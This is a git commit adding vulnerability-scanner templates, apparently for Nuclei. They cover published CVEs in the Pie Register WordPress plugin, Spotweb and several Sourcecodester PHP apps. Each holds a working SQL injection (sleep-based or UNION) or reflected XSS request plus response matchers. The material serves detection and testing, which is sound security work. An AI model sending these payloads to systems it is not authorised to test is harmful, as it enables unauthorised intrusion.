templates added
parent
bb76430753
commit
ffc66c4bd8
|
@ -0,0 +1,41 @@
|
|||
id: CVE-2021-24731
|
||||
|
||||
info:
|
||||
name: Pie Register < 3.7.1.6 - SQL Injection
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
The Registration Forms User profile, Content Restriction, Spam Protection, Payment Gateways, Invitation Codes WordPress plugin before 3.7.1.6 does not properly escape user data before using it in a SQL statement in the wp-json/pie/v1/login REST API endpoint, leading to an SQL injection.
|
||||
remediation: Fixed in version 3.7.1.6
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/6bed00e4-b363-43b8-a392-d068d342151a
|
||||
- https://wordpress.org/plugins/pie-register/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-24731
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2021-24731
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
max-request: 1
|
||||
verified: "true"
|
||||
tags: cve,cve2021,sqli,wpscan,wordpress,wp-plugin,wp,pie-register,unauth
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
@timeout: 10s
|
||||
POST /wp-json/pie/v1/login HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
|
||||
user_login='+AND+(SELECT+8149+FROM+(SELECT(SLEEP(3)))NuqO)+AND+'YvuB'='YvuB&login_pass=a
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=6'
|
||||
- 'status_code == 200'
|
||||
- 'contains(content_type, "application/json")'
|
||||
- 'contains(body, "User credentials are invalid.")'
|
||||
condition: and
|
|
@ -0,0 +1,47 @@
|
|||
id: CVE-2021-27124
|
||||
|
||||
info:
|
||||
name: Doctor Appointment System 1.0 - SQL Injection
|
||||
author: theamanrawat
|
||||
severity: medium
|
||||
description: |
|
||||
SQL injection in the expertise parameter in search_result.php in Doctor Appointment System v1.0.
|
||||
reference:
|
||||
- https://www.sourcecodester.com/php/14182/doctor-appointment-system.html
|
||||
- https://packetstormsecurity.com/files/161342/Doctor-Appointment-System-1.0-SQL-Injection.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-27124
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 6.5
|
||||
cve-id: CVE-2021-27124
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve,cve2021,sqli,doctor-appointment-system,unauthenticated
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
POST /patient/search_result.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
expertise=Heart'+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,md5('999999999'),NULL,NULL,NULL,NULL,NULL,NULL--+-&submit=
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "c8c605999f3d8352d7bb792cf3fdb25b"
|
||||
- "Doctor Appoinment System"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,39 @@
|
|||
id: CVE-2021-40908
|
||||
|
||||
info:
|
||||
name: Purchase Order Management v1.0 - SQL Injection
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
SQL injection vulnerability in Login.php in Sourcecodester Purchase Order Management System v1 by oretnom23, allows attackers to execute arbitrary SQL commands via the username parameter.
|
||||
reference:
|
||||
- https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/CVE-nu11-09
|
||||
- https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-40908
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2021-40908
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
max-req: 1
|
||||
verified: "true"
|
||||
tags: cve,cve2021,sqli,purchase-order,poms
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
POST /classes/Login.php?f=login HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
|
||||
username=test'+AND+(SELECT+4458+FROM+(SELECT(SLEEP(6)))JblN)+AND+'orQN'='orQN&password=test
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=6'
|
||||
- 'status_code == 200'
|
||||
- 'contains(header, "text/html")'
|
||||
- 'contains(body, "status\":\"incorrect\"")'
|
||||
condition: and
|
|
@ -0,0 +1,50 @@
|
|||
id: CVE-2021-40968
|
||||
|
||||
info:
|
||||
name: Spotweb <= 1.5.1 - Cross Site Scripting
|
||||
author: theamanrawat
|
||||
severity: medium
|
||||
description: |
|
||||
Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the newpassword2 parameter.
|
||||
remediation: Fixed in version 1.5.2
|
||||
reference:
|
||||
- https://github.com/spotweb/spotweb/
|
||||
- https://github.com/spotweb/spotweb/issues/711
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-40968
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2021-40968
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
max-request: 1
|
||||
verified: "true"
|
||||
shodan-query: title:"SpotWeb - overview"
|
||||
tags: cve,cve2021,xss,spotweb
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
POST /install.php?page=4 HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
settingsform[newpassword2]=pdteam'+onclick='alert(document.domain)
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "onclick='alert(document.domain)"
|
||||
- "Spotweb"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,50 @@
|
|||
id: CVE-2021-40969
|
||||
|
||||
info:
|
||||
name: Spotweb <= 1.5.1 - Cross Site Scripting (Reflected)
|
||||
author: theamanrawat
|
||||
severity: medium
|
||||
description: |
|
||||
Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the firstname parameter.
|
||||
remediation: Fixed in version 1.5.2
|
||||
reference:
|
||||
- https://github.com/spotweb/spotweb/
|
||||
- https://github.com/spotweb/spotweb/issues/711
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-40969
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2021-40969
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
max-request: 1
|
||||
verified: "true"
|
||||
shodan-query: title:"SpotWeb - overview"
|
||||
tags: cve,cve2021,xss,spotweb
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
POST /install.php?page=4 HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
settingsform[firstname]=pdteam'+onclick='alert(document.domain)
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "onclick='alert(document.domain)"
|
||||
- "Spotweb"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,50 @@
|
|||
id: CVE-2021-40970
|
||||
|
||||
info:
|
||||
name: Spotweb <= 1.5.1 - Cross Site Scripting (Reflected)
|
||||
author: theamanrawat
|
||||
severity: medium
|
||||
description: |
|
||||
Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the username parameter.
|
||||
remediation: Fixed in version 1.5.2
|
||||
reference:
|
||||
- https://github.com/spotweb/spotweb/
|
||||
- https://github.com/spotweb/spotweb/issues/711
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-40970
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2021-40970
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
max-request: 1
|
||||
verified: "true"
|
||||
shodan-query: title:"SpotWeb - overview"
|
||||
tags: cve,cve2021,xss,spotweb,unauthenticated
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
POST /install.php?page=1 HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
settingsform[username]=pdteam'+onclick='alert(document.domain)
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "onclick='alert(document.domain)"
|
||||
- "Spotweb"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,50 @@
|
|||
id: CVE-2021-40971
|
||||
|
||||
info:
|
||||
name: Spotweb <= 1.5.1 - Cross Site Scripting
|
||||
author: theamanrawat
|
||||
severity: medium
|
||||
description: |
|
||||
Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the newpassword1 parameter.
|
||||
remediation: Fixed in version 1.5.2
|
||||
reference:
|
||||
- https://github.com/spotweb/spotweb/
|
||||
- https://github.com/spotweb/spotweb/issues/711
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-40971
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2021-40971
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
max-request: 1
|
||||
verified: "true"
|
||||
shodan-query: title:"SpotWeb - overview"
|
||||
tags: cve,cve2021,xss,spotweb
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
POST /install.php?page=4 HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
settingsform[newpassword1]=pdteam'+onclick='alert(document.domain)
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "onclick='alert(document.domain)"
|
||||
- "Spotweb"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,50 @@
|
|||
id: CVE-2021-40972
|
||||
|
||||
info:
|
||||
name: Spotweb <= 1.5.1 - Cross Site Scripting
|
||||
author: theamanrawat
|
||||
severity: medium
|
||||
description: |
|
||||
Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the mail parameter.
|
||||
remediation: Fixed in version 1.5.2
|
||||
reference:
|
||||
- https://github.com/spotweb/spotweb/
|
||||
- https://github.com/spotweb/spotweb/issues/711
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-40972
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2021-40972
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
max-request: 1
|
||||
verified: "true"
|
||||
shodan-query: title:"SpotWeb - overview"
|
||||
tags: cve,cve2021,xss,spotweb
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
POST /install.php?page=4 HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
settingsform[mail]=pdteam'+onclick='alert(document.domain)
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "onclick='alert(document.domain)"
|
||||
- "Spotweb"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,50 @@
|
|||
id: CVE-2021-40973
|
||||
|
||||
info:
|
||||
name: Spotweb <= 1.5.1 - Cross Site Scripting
|
||||
author: theamanrawat
|
||||
severity: medium
|
||||
description: |
|
||||
Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the lastname parameter.
|
||||
remediation: Fixed in version 1.5.2
|
||||
reference:
|
||||
- https://github.com/spotweb/spotweb/
|
||||
- https://github.com/spotweb/spotweb/issues/711
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-40973
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2021-40973
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
max-request: 1
|
||||
verified: "true"
|
||||
shodan-query: title:"SpotWeb - overview"
|
||||
tags: cve,cve2021,xss,spotweb
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
POST /install.php?page=4 HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
settingsform[lastname]=pdteam'+onclick='alert(document.domain)
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "onclick='alert(document.domain)"
|
||||
- "Spotweb"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,43 @@
|
|||
id: CVE-2021-43725
|
||||
|
||||
info:
|
||||
name: Spotweb <= 1.5.1 - Cross Site Scripting (Reflected)
|
||||
author: theamanrawat
|
||||
severity: medium
|
||||
description: |
|
||||
There is a Cross Site Scripting (XSS) vulnerability in SpotPage_login.php of Spotweb 1.5.1 and below, which allows remote attackers to inject arbitrary web script or HTML via the data[performredirect] parameter.
|
||||
remediation: Fixed in version 1.5.2
|
||||
reference:
|
||||
- https://github.com/spotweb/spotweb/
|
||||
- https://github.com/spotweb/spotweb/issues/718
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-43725
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2021-43725
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
verified: "true"
|
||||
shodan-query: title:"SpotWeb - overview"
|
||||
tags: cve,cve2021,xss,spotweb,unauth
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/?data[performredirect]=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&page=login"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'name="data[performredirect]" value=""><script>alert(document.domain)</script>'
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,38 @@
|
|||
id: CVE-2022-28022
|
||||
|
||||
info:
|
||||
name: Purchase Order Management v1.0 - SQL Injection
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
Purchase Order Management System v1.0 was discovered to contain a SQL injection vulnerability via /purchase_order/classes/Master.php?f=delete_item.
|
||||
reference:
|
||||
- https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/purchase-order-management-system/SQLi-1.md
|
||||
- https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-28022
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2022-28022
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve,cve2022,sqli,purchase-order-management-system,unauth
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
POST /classes/Master.php?f=delete_item HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
|
||||
id=test'+AND+(SELECT+2844+FROM+(SELECT(SLEEP(6)))FDTM)+AND+'sWZA'='sWZA
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=6'
|
||||
- 'status_code == 200'
|
||||
- 'contains(header, "text/html")'
|
||||
- 'contains(body, "success")'
|
||||
condition: and
|
|
@ -0,0 +1,39 @@
|
|||
id: CVE-2022-28023
|
||||
|
||||
info:
|
||||
name: Purchase Order Management v1.0 - SQL Injection
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
Purchase Order Management System v1.0 was discovered to contain a SQL injection vulnerability via /purchase_order/classes/Master.php?f=delete_supplier.
|
||||
reference:
|
||||
- https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/purchase-order-management-system/SQLi-2.md
|
||||
- https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-28023
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2022-28023
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
max-req: 1
|
||||
verified: "true"
|
||||
tags: cve,cve2022,sqli,purchase-order,poms
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
POST /classes/Master.php?f=delete_supplier HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
|
||||
id=aman'+AND+(SELECT+2844+FROM+(SELECT(SLEEP(6)))FDTM)+AND+'sWZA'='sWZA
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=6'
|
||||
- 'status_code == 200'
|
||||
- 'contains(header, "text/html")'
|
||||
- 'contains(body, "status\":\"success")'
|
||||
condition: and
|
|
@ -0,0 +1,37 @@
|
|||
id: CVE-2022-31879
|
||||
|
||||
info:
|
||||
name: Online Fire Reporting System v1.0 - SQL injection
|
||||
author: theamanrawat
|
||||
severity: high
|
||||
description: |
|
||||
Online Fire Reporting System 1.0 is vulnerable to SQL Injection via the date parameter.
|
||||
reference:
|
||||
- https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Online-Fire-Reporting
|
||||
- https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-31879
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 8.8
|
||||
cve-id: CVE-2022-31879
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
max-request: 1
|
||||
verified: "true"
|
||||
tags: cve,cve2022,sqli,online-fire-reporting
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
@timeout: 10s
|
||||
GET /admin/?page=reports&date=2022-05-24-6'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=6'
|
||||
- 'status_code == 200'
|
||||
- 'contains(content_type, "text/html")'
|
||||
- 'contains(body, "Dashboard")'
|
||||
condition: and
|
|
@ -0,0 +1,45 @@
|
|||
id: CVE-2022-31974
|
||||
|
||||
info:
|
||||
name: Online Fire Reporting System v1.0 - SQL injection
|
||||
author: theamanrawat
|
||||
severity: high
|
||||
description: |
|
||||
Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=reports&date=.
|
||||
reference:
|
||||
- https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-1.md
|
||||
- https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-31974
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 7.2
|
||||
cve-id: CVE-2022-31974
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
max-request: 1
|
||||
verified: "true"
|
||||
tags: cve,cve2022,sqli,online-fire-reporting
|
||||
|
||||
variables:
|
||||
num: '999999999'
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/admin/?page=reports&date=2022-05-27%27%20union%20select%201,2,3,md5('{{num}}'),5,6,7,8,9,10--+"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "{{md5(num)}}"
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,40 @@
|
|||
id: CVE-2022-31975
|
||||
|
||||
info:
|
||||
name: Online Fire Reporting System v1.0 - SQL injection
|
||||
author: theamanrawat
|
||||
severity: high
|
||||
description: |
|
||||
Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=user/manage_user&id=.
|
||||
reference:
|
||||
- https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-2.md
|
||||
- https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-31975
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 7.2
|
||||
cve-id: CVE-2022-31975
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
max-req: 1
|
||||
verified: "true"
|
||||
tags: cve,cve2022,sqli,online-fire-reporting
|
||||
|
||||
variables:
|
||||
num: '999999999'
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/admin/?page=user/manage_user&id=-6%27%20union%20select%201,md5('{{num}}'),3,4,5,6,7,8,9,10,11--+"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "{{md5(num)}}"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,40 @@
|
|||
id: CVE-2022-31976
|
||||
|
||||
info:
|
||||
name: Online Fire Reporting System v1.0 - SQL injection
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/classes/Master.php?f=delete_request.
|
||||
reference:
|
||||
- https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-4.md
|
||||
- https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-31976
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2022-31976
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
max-req: 1
|
||||
verified: "true"
|
||||
tags: cve,cve2022,sqli,online-fire-reporting
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
@timeout: 10s
|
||||
POST /classes/Master.php?f=delete_request HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
id='+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=6'
|
||||
- 'status_code == 200'
|
||||
- 'contains(content_type, "text/html")'
|
||||
- 'contains(body, "status\":\"success\"}")'
|
||||
condition: and
|
|
@ -0,0 +1,40 @@
|
|||
id: CVE-2022-31977
|
||||
|
||||
info:
|
||||
name: Online Fire Reporting System v1.0 - SQL injection
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/classes/Master.php?f=delete_team.
|
||||
reference:
|
||||
- https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-3.md
|
||||
- https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-31977
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2022-31977
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
max-req: 1
|
||||
verified: "true"
|
||||
tags: cve,cve2022,sqli,online-fire-reporting
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
@timeout: 10s
|
||||
POST /classes/Master.php?f=delete_team HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
id='+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=6'
|
||||
- 'status_code == 200'
|
||||
- 'contains(content_type, "text/html")'
|
||||
- 'contains(body, "status\":\"success\"}")'
|
||||
condition: and
|
|
@ -0,0 +1,40 @@
|
|||
id: CVE-2022-31978
|
||||
|
||||
info:
|
||||
name: Online Fire Reporting System v1.0 - SQL injection
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/classes/Master.php?f=delete_inquiry.
|
||||
reference:
|
||||
- https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-5.md
|
||||
- https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-31978
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2022-31978
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
max-request: 1
|
||||
verified: "true"
|
||||
tags: cve,cve2022,sqli,online-fire-reporting
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
@timeout: 10s
|
||||
POST /classes/Master.php?f=delete_inquiry HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
id='+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=6'
|
||||
- 'status_code == 200'
|
||||
- 'contains(content_type, "text/html")'
|
||||
- 'contains(body, "status\":\"success")'
|
||||
condition: and
|
|
@ -0,0 +1,35 @@
|
|||
id: CVE-2022-31980
|
||||
|
||||
info:
|
||||
name: Online Fire Reporting System v1.0 - SQL injection
|
||||
author: theamanrawat
|
||||
severity: high
|
||||
description: |
|
||||
Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=teams/manage_team&id=.
|
||||
reference:
|
||||
- https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-7.md
|
||||
- https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-31980
|
||||
classification:
|
||||
